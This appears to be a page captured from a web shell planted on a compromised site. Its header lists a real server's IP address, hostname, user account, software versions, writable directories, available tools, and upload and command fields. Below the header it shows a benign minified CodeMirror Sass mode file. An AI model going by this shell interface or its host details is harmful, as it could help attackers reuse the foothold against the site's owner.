Private
Server IP : 195.201.23.43  /  Your IP : 3.142.199.81
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/kdecoratie/public_html/media/editors/codemirror/mode/sass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/kdecoratie/public_html/media/editors/codemirror/mode/sass/sass.min.js
!(function(a){"object"==typeof exports&&"object"==typeof module?a(require("../../lib/codemirror"),require("../css/css")):"function"==typeof define&&define.amd?define(["../../lib/codemirror","../css/css"],a):a(CodeMirror)})((function(a){"use strict";a.defineMode("sass",(function(b){function c(a){return!a.peek()||a.match(/\s+$/,!1)}function d(a,b){var c=a.peek();return")"===c?(a.next(),b.tokenizer=j,"operator"):"("===c?(a.next(),a.eatSpace(),"operator"):"'"===c||'"'===c?(b.tokenizer=f(a.next()),"string"):(b.tokenizer=f(")",!1),"string")}function e(a,b){return function(c,d){return c.sol()&&c.indentation()<=a?(d.tokenizer=j,j(c,d)):(b&&c.skipTo("*/")?(c.next(),c.next(),d.tokenizer=j):c.skipToEnd(),"comment")}}function f(a,b){function d(e,f){var h=e.next(),i=e.peek(),k=e.string.charAt(e.pos-2);return"\\"!==h&&i===a||h===a&&"\\"!==k?(h!==a&&b&&e.next(),c(e)&&(f.cursorHalf=0),f.tokenizer=j,"string"):"#"===h&&"{"===i?(f.tokenizer=g(d),e.next(),"operator"):"string"}return null==b&&(b=!0),d}function g(a){return function(b,c){return"}"===b.peek()?(b.next(),c.tokenizer=a,"operator"):j(b,c)}}function h(a){if(0==a.indentCount){a.indentCount++;var c=a.scopes[0].offset,d=c+b.indentUnit;a.scopes.unshift({offset:d})}}function i(a){1!=a.scopes.length&&a.scopes.shift()}function j(a,b){var k=a.peek();if(a.match("/*"))return b.tokenizer=e(a.indentation(),!0),b.tokenizer(a,b);if(a.match("//"))return b.tokenizer=e(a.indentation(),!1),b.tokenizer(a,b);if(a.match("#{"))return b.tokenizer=g(j),"operator";if('"'===k||"'"===k)return a.next(),b.tokenizer=f(k),"string";if(b.cursorHalf){if("#"===k&&(a.next(),a.match(/[0-9a-fA-F]{6}|[0-9a-fA-F]{3}/)))return c(a)&&(b.cursorHalf=0),"number";if(a.match(/^-?[0-9\.]+/))return c(a)&&(b.cursorHalf=0),"number";if(a.match(/^(px|em|in)\b/))return c(a)&&(b.cursorHalf=0),"unit";if(a.match(s))return c(a)&&(b.cursorHalf=0),"keyword";if(a.match(/^url/)&&"("===a.peek())return b.tokenizer=d,c(a)&&(b.cursorHalf=0),"atom";if("$"===k)return a.next(),a.eatWhile(/[\w-]/),c(a)&&(b.cursorHalf=0),"variable-2";if("!"===k)return a.next(),b.cursorHalf=0,a.match(/^[\w]+/)?"keyword":"operator";if(a.match(u))return c(a)&&(b.cursorHalf=0),"operator";if(a.eatWhile(/[\w-]/))return c(a)&&(b.cursorHalf=0),l=a.current().toLowerCase(),p.hasOwnProperty(l)?"atom":o.hasOwnProperty(l)?"keyword":n.hasOwnProperty(l)?(b.prevProp=a.current().toLowerCase(),"property"):"tag";if(c(a))return b.cursorHalf=0,null}else{if("-"===k&&a.match(/^-\w+-/))return"meta";if("."===k){if(a.next(),a.match(/^[\w-]+/))return h(b),"qualifier";if("#"===a.peek())return h(b),"tag"}if("#"===k){if(a.next(),a.match(/^[\w-]+/))return h(b),"builtin";if("#"===a.peek())return h(b),"tag"}if("$"===k)return a.next(),a.eatWhile(/[\w-]/),"variable-2";if(a.match(/^-?[0-9\.]+/))return"number";if(a.match(/^(px|em|in)\b/))return"unit";if(a.match(s))return"keyword";if(a.match(/^url/)&&"("===a.peek())return b.tokenizer=d,"atom";if("="===k&&a.match(/^=[\w-]+/))return h(b),"meta";if("+"===k&&a.match(/^\+[\w-]+/))return"variable-3";if("@"===k&&a.match("@extend")&&(a.match(/\s*[\w]/)||i(b)),a.match(/^@(else if|if|media|else|for|each|while|mixin|function)/))return h(b),"def";if("@"===k)return a.next(),a.eatWhile(/[\w-]/),"def";if(a.eatWhile(/[\w-]/)){if(a.match(/ *: *[\w-\+\$#!\("']/,!1)){l=a.current().toLowerCase();var m=b.prevProp+"-"+l;return n.hasOwnProperty(m)?"property":n.hasOwnProperty(l)?(b.prevProp=l,"property"):q.hasOwnProperty(l)?"property":"tag"}return a.match(/ *:/,!1)?(h(b),b.cursorHalf=1,b.prevProp=a.current().toLowerCase(),"property"):a.match(/ *,/,!1)?"tag":(h(b),"tag")}if(":"===k)return a.match(v)?"variable-3":(a.next(),b.cursorHalf=1,"operator")}return a.match(u)?"operator":(a.next(),null)}function k(a,c){a.sol()&&(c.indentCount=0);var d=c.tokenizer(a,c),e=a.current();if("@return"!==e&&"}"!==e||i(c),null!==d){for(var f=a.pos-e.length,g=f+b.indentUnit*c.indentCount,h=[],j=0;j<c.scopes.length;j++){var k=c.scopes[j];k.offset<=g&&h.push(k)}c.scopes=h}return d}var l,m=a.mimeModes["text/css"],n=m.propertyKeywords||{},o=m.colorKeywords||{},p=m.valueKeywords||{},q=m.fontProperties||{},r=["true","false","null","auto"],s=new RegExp("^"+r.join("|")),t=["\\(","\\)","=",">","<","==",">=","<=","\\+","-","\\!=","/","\\*","%","and","or","not",";","\\{","\\}",":"],u=(function(a){return new RegExp("^"+a.join("|"))})(t),v=/^::?[a-zA-Z_][\w\-]*/;return{startState:function(){return{tokenizer:j,scopes:[{offset:0,type:"sass"}],indentCount:0,cursorHalf:0,definedVars:[],definedMixins:[]}},token:function(a,b){var c=k(a,b);return b.lastToken={style:c,content:a.current()},c},indent:function(a){return a.scopes[0].offset},blockCommentStart:"/*",blockCommentEnd:"*/",lineComment:"//",fold:"indent"}}),"css"),a.defineMIME("text/x-sass","sass")}));
Private